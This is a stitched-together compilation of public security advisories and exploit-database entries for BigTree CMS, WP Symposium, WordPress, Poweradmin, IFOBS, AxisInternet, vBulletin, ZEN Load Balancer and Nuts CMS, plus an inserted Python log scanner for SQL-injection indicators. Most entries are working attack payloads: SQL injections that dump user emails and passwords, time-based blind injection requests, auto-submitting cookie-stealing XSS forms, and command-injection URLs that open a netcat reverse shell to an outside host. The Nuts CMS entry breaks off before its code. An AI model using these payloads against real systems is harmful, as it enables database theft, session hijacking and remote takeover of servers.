
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team

Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html

1. Introduction

Affected Product:    BigTree CMS 4.2.3
Fixed in:            4.2.4
Fixed Version Link:  https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Vendor Contact:      contribute@bigtreecms.org
Vulnerability Type:  Multiple SQL Injections
Remote Exploitable:  Yes
Reported to vendor:  07/07/2015
Disclosed to public: 08/07/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromise
of the host.

Please note that you have to be authenticated to exploit this issue.

SQL Injection 1

The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.

Proof of Concept (Show all BigTree users):

http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from bigtree_users %23/

Code:

core/admin/modules/pages/view-tree.php:151 (page id is user controlled)

    $nav_visible = array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
    $nav_hidden = array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
    $nav_archived = $admin->getArchivedNavigationByParent($page["id"]);

core/inc/bigtree/admin.php:2638

    static function getArchivedNavigationByParent($parent) {
        [...]
        $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY nav_title asc");

core/inc/bigtree/admin.php:3167

    static function getHiddenNavigationByParent($parent) {
        [...]
        $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived != 'on' ORDER BY nav_title asc");

core/inc/bigtree/admin.php:3758

    static function getNaturalNavigationByParent($parent,$levels = 1) {
        [...]
        $q = sqlquery("SELECT id,nav_title AS title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND archived != 'on' ORDER BY position DESC, id ASC");

core/inc/bigtree/admin.php:4531

    static function getPendingNavigationByParent($parent,$in_nav = true) {
        [...]
        $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type = 'NEW' ORDER BY date DESC");

SQL Injection 2

When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.

When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.

Proof of Concept:

1. Create a user with the email address:
   f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. The result can be seen in multiple places

Code:

core/inc/bigtree/admin.php:81

    $f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id = '".$_SESSION["bigtree_admin"]["id"]."' AND email = '".$_SESSION["bigtree_admin"]["email"]."'"));

SQL Injection 3 (Blind)

The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.

Proof of Concept:

http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
    POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of All Sizes

http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
    POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of All Sizes

Code:

core/admin/ajax/pages/get-seo-score.php:4

    $seo = $admin->getPageSEORating($_POST,$_POST["resources"]);

core/inc/bigtree/admin.php:4222

    static function getPageSEORating($page,$content) {
        [...]
        if ($page["title"]) {
            $score += 5;
            // They have a title, let's see if it's unique
            $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));

3. Solution

To mitigate this issue, please upgrade to version 4.2.3 or later:

https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip

Please note that a newer version might already be available.

4. Report Timeline

07/07/2015   Informed vendor about the issue
07/08/2015   Vendor sends fixes for confirmation
07/10/2015   Fixes confirmed
07/26/2015   Vendor releases version 4.2.3
08/07/2015   Disclosed to public
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)

Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data

Vulnerability
================
An unauthenticated user can run a blind SQL injection against the site and extract password hashes and other information from the database.

Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
 

Mitigations
================
Upgrade to version 15.8 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published


Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.
            
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE: 
# Category: remote

1. Product Description
Extract from the plugin page:
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."

2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL injection in the 'size' parameter of get_album_item.php.
The issue is exploitable even if the plugin is deactivated.

3. Impact Analysis

The SQL injection makes it very easy to retrieve the entire database content, which includes user details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator's password is obtained, the attacker could take complete control of the Wordpress installation. Collected information may also enable further attacks.

4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)

* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)

* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10

5. Proof of Concept

PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example:
5.5.44-0+deb7u1

6. Vulnerability Timeline
2015-05    : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-08-04 : Response : 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)

7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.

8. Personal Notes

I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interested in any discussion/advice/question/criticism about security/exploits/programming :-)
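Both WP Symposium reports above leave the same trace in server logs: a single parameter value carrying a SQL fragment (`version() ; --` in the 'size' parameter, `1 AND SLEEP(5)` in topic_id), and in the time-based case a response that takes about five seconds. The script below is an added example, not code from either advisory or from the plugin. It decodes request parameters, flags a small set of SQL-injection indicators, and, when the access log carries a request duration field, corroborates a sleep() indicator with the slow response. The log lines are constructed; the `%D` duration column, the pattern labels and the five-second threshold are assumptions, and POST bodies only reach `scan_request` when the application or a WAF logs them, since a plain access log does not contain them.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns checked against each decoded parameter value. They are kept
# narrow on purpose: '--' or '#' inside a free-text field is a plausible false
# positive, so the labels are evidence to weigh, not a verdict.
SQLI_PATTERNS = [
    ("sleep-call",         re.compile(r"\bsleep\s*\(", re.I)),
    ("union-select",       re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("version-call",       re.compile(r"\bversion\s*\(\s*\)", re.I)),
    ("comment-terminator", re.compile(r"--|#|/\*")),
    ("tautology",          re.compile(r"\b(?:or|and)\b\s+\d+\s*=\s*\d+", re.I)),
]

# Apache common log format with one assumed extra trailing field: the request
# duration in microseconds (%D). The field is optional so plain CLF lines parse too.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: (?P<usec>\d+))?'
)


def decode_params(raw):
    """Split a query string or urlencoded body into decoded (name, value) pairs.
    Hand-rolled rather than parse_qsl so a ';' inside a value is never a separator."""
    pairs = []
    for field in raw.split("&"):
        if field:
            name, _, value = field.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_request(target, body=""):
    """Return [(source, param, [labels])] for every parameter matching an indicator."""
    findings = []
    query = target.partition("?")[2]
    for source, raw in (("query", query), ("body", body)):
        for name, value in decode_params(raw):
            labels = [label for label, rx in SQLI_PATTERNS if rx.search(value)]
            if labels:
                findings.append((source, name, labels))
    return findings


def scan_access_log(lines, slow_threshold_s=5.0):
    """Scan each parsable line; when a sleep() indicator coincides with a response
    at or above the threshold, add the timing corroboration as a separate finding."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = scan_request(m.group("target"))
        usec = m.group("usec")
        if (usec is not None and int(usec) / 1e6 >= slow_threshold_s
                and any("sleep-call" in labels for _, _, labels in findings)):
            findings.append(("timing", "response", ["slow-response"]))
        if findings:
            alerts.append((m.group("client"), m.group("target"), findings))
    return alerts


# Constructed sample log. The first two requests reuse the parameter values from the
# two WP Symposium PoCs (the SLEEP one moved from a POST body into a GET query string
# so that it appears in an access log); the third is ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2015:12:00:01 +0000] "GET /wordpress/wp-content/plugins/'
    'wp-symposium/get_album_item.php?size=version%28%29%20;%20-- HTTP/1.1" 200 41 12034',
    '203.0.113.7 - - [10/Aug/2015:12:00:09 +0000] "GET /wordpress/wp-content/plugins/'
    'wp-symposium/ajax/forum_functions.php?action=getTopic&topic_id=1+AND+SLEEP(5)&group_id=0'
    ' HTTP/1.1" 200 2 5012345',
    '198.51.100.4 - - [10/Aug/2015:12:00:10 +0000] "GET /wordpress/wp-content/plugins/'
    'wp-symposium/get_album_item.php?size=thumb HTTP/1.1" 200 8421 3120',
]


if __name__ == "__main__":
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(client, target)
        for source, param, labels in findings:
            print(f"    {source}.{param}: {', '.join(labels)}")
```

Running it prints two alerts for 203.0.113.7 and nothing for the benign request. The timing corroboration is what separates a curious scanner from a working time-based oracle: a sleep() string in a parameter is noise until the response time moves with it.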
            
HireHackking

WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities

source: https://www.securityfocus.com/bid/55597/info

WordPress is prone to multiple path-disclosure vulnerabilities. Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.

WordPress 3.4.2 is vulnerable; other versions may also be affected.

http://www.example.com/learn/t/wordpress/wp-includes/vars.php
http://www.example.com/learn/t/wordpress/wp-includes/update.php
http://www.example.com/learn/t/wordpress/wp-includes/theme.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/rss.php
http://www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/registration.php
http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/post.php
http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
http://www.example.com/learn/t/wordpress/wp-includes/media.php
http://www.example.com/learn/t/wordpress/wp-includes/kses.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
http://www.example.com/learn/t/wordpress/wp-includes/functions.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
HireHackking

Poweradmin - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/55619/info

Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E
HireHackking

ZEN Load Balancer - Multiple Vulnerabilities

source: https://www.securityfocus.com/bid/55638/info

ZEN Load Balancer is prone to the following security vulnerabilities:

1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability

An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive information.

ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable.

http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/
HireHackking
source: https://www.securityfocus.com/bid/55577/info

minimal Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

minimal Gallery 0.8.1 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?c=[XSS]
http://www.example.com/PAth/index.php?s=[XSS]
http://www.example.com/PAth/index.php?s=y&id=[XSS]
http://www.example.com/PAth/index.php?m=[XSS]
http://www.example.com/PAth/index.php?d=[XSS]
HireHackking
source: https://www.securityfocus.com/bid/55561/info

IFOBS is prone to multiple HTML-injection vulnerabilities. Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

IFOBS XSS-1.html

    <html>
    <head>
    <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
    <input type="hidden" name="secondName" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="myaction" value="1">
    </form>
    </body>
    </html>

IFOBS XSS-2.html

    <html>
    <head>
    <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
    <input type="hidden" name="firstName" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="myaction" value="1">
    </form>
    </body>
    </html>

IFOBS XSS-3.html

    <html>
    <head>
    <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
    <input type="hidden" name="thirdName" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="myaction" value="1">
    </form>
    </body>
    </html>

IFOBS XSS-4.html

    <html>
    <head>
    <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
    <input type="hidden" name="BirthDay" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="BirthYear" value="2012">
    <input type="hidden" name="myaction" value="1">
    </form>
    </body>
    </html>

IFOBS XSS-5.html

    <html>
    <head>
    <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
    <input type="hidden" name="BirthMonth" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="BirthYear" value="2012">
    <input type="hidden" name="myaction" value="1">
    </form>
    </body>
    </html>
HireHackking
source: https://www.securityfocus.com/bid/55589/info

AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

AxisInternet VoIP Manager 2.1.5.7 is vulnerable; other versions may also be affected.

https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C
https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+
HireHackking

vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection

source: https://www.securityfocus.com/bid/55592/info

VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

VBulletin 4.1.12 is vulnerable; other versions may also be affected.

http://www.example.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
HireHackking

Nuts CMS - PHP Remote Code Injection / Execution

<?php
# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit
#
# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.
# Nuts CMS is an open source solution that is freely available to everyone.
#
# Discovered by Yakir Wizman
# Date 17/08/2015
# Vendor Homepage : http://www.nuts-cms.com/
# CVE : N/A
# Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).
###
# Exploit code:

